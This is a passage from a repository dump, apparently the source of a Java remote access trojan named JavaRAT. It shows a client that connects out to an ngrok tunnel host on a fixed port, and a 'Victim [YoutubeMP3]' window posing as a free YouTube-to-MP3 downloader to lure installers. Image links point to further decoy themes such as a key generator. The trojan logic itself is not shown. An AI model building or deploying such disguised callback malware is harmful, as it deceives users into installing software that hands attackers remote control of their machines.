11 | Controller ctrl = new Controller("0.tcp.ngrok.io", 19663);
12 | //Controller ctrl = new Controller("192.168.0.159", 5123);
13 | ctrl.run();
14 | }
15 | }
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/src/view/MainWindow.java:
--------------------------------------------------------------------------------
1 | package view;
2 | import java.awt.BorderLayout;
3 | import java.awt.Color;
4 | import java.awt.Dimension;
5 |
6 | import javax.swing.Box;
7 | import javax.swing.BoxLayout;
8 | import javax.swing.ImageIcon;
9 | import javax.swing.JButton;
10 | import javax.swing.JFrame;
11 | import javax.swing.JLabel;
12 | import javax.swing.JPanel;
13 | import javax.swing.JTextField;
14 |
15 | public class MainWindow extends JFrame{
16 | public MainWindow(){
17 | super("Youtube to MP3 downloader [FREE VERSION]");
18 |
19 | JPanel mainPanel = new JPanel(new BorderLayout());
20 |
21 | JPanel imagePanel = new JPanel();
22 | imagePanel.setBackground(Color.WHITE);
23 | imagePanel.add(new JLabel(new ImageIcon("youtubeMP3.png")));
24 | mainPanel.add(imagePanel, BorderLayout.PAGE_START);
25 |
26 | JPanel centerPanel = new JPanel();
27 | centerPanel.setLayout(new BoxLayout(centerPanel, BoxLayout.X_AXIS));
28 | centerPanel.setBackground(Color.WHITE);
29 |
30 | centerPanel.add(Box.createRigidArea(new Dimension(10, 0)));
31 |
32 | JLabel urlLabel = new JLabel("URL: ");
33 | centerPanel.add(urlLabel);
34 |
35 | JTextField url = new JTextField(50);
36 | url.setPreferredSize(new Dimension(500, 25));
37 | url.setMaximumSize(new Dimension(500, 25));
38 | url.setMinimumSize(new Dimension(500, 25));
39 | centerPanel.add(url);
40 |
41 | JButton urlButton = new JButton("Download as mp3");
42 | centerPanel.add(urlButton);
43 |
44 | mainPanel.add(centerPanel, BorderLayout.CENTER);
45 |
46 | this.setContentPane(mainPanel);
47 | this.setVisible(true);
48 | this.setSize(700, 220);
49 | this.setResizable(false);
50 | this.setLocationRelativeTo(null);
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/Victim [YoutubeMP3]/youtubeMP3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [YoutubeMP3]/youtubeMP3.png
--------------------------------------------------------------------------------
/git resources/console.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/git resources/console.jpg
--------------------------------------------------------------------------------
/git resources/csgo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/git resources/csgo.png
--------------------------------------------------------------------------------
/git resources/keyGen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/git resources/keyGen.png
--------------------------------------------------------------------------------
/git resources/youtubeMP3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/git resources/youtubeMP3.png
--------------------------------------------------------------------------------